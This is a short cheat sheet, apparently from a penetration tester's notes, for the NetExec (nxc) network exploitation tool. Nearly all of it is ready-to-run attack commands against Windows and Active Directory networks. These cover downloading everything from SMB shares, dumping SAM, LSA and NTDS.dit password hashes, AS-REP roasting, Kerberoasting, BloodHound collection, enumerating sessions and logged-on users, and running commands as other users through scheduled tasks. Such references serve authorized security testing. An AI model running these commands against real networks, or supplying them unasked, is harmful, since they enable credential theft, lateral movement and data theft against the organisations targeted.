# NetExec


NetExec (a.k.a. nxc) is a network service exploitation tool that helps automate assessing the security of *large* networks. It is based on CrackMapExec, so its usage will be familiar to anyone who has used that tool.

Personally, I think the modules from NetExec make the tool worth using.

Documentation: <https://www.netexec.wiki/>

***

## SMB spidering shares

Spider and export all files from shares:

```
nxc smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus -o DOWNLOAD_FLAG=True
```

List all readable files:

```
nxc smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus
```

## Dumping hashes

Dumping SAM:

```
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
```

Dumping LSA:

```
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
```

Dumping from NTDS.dit:

```
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
```

## BloodHound

If you have creds, you can use nxc to get a zip or .json files for BloodHound:

```
nxc ldap <ip> -u user -p pass --bloodhound -ns <ns-ip> --collection All
```

## AS-REP Roasting

For a single user:

```
nxc ldap 192.168.0.104 -u harry -p '' --asreproast output.txt
```

With a file containing a list of usernames:

```
nxc ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
```

## Kerberoasting

```
nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt
```

## SMB logged on users

```
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users
```

## SMB active sessions

```
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions
```

## SMB Execute commands on behalf of other users

```
nxc smb <ip> -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>
```


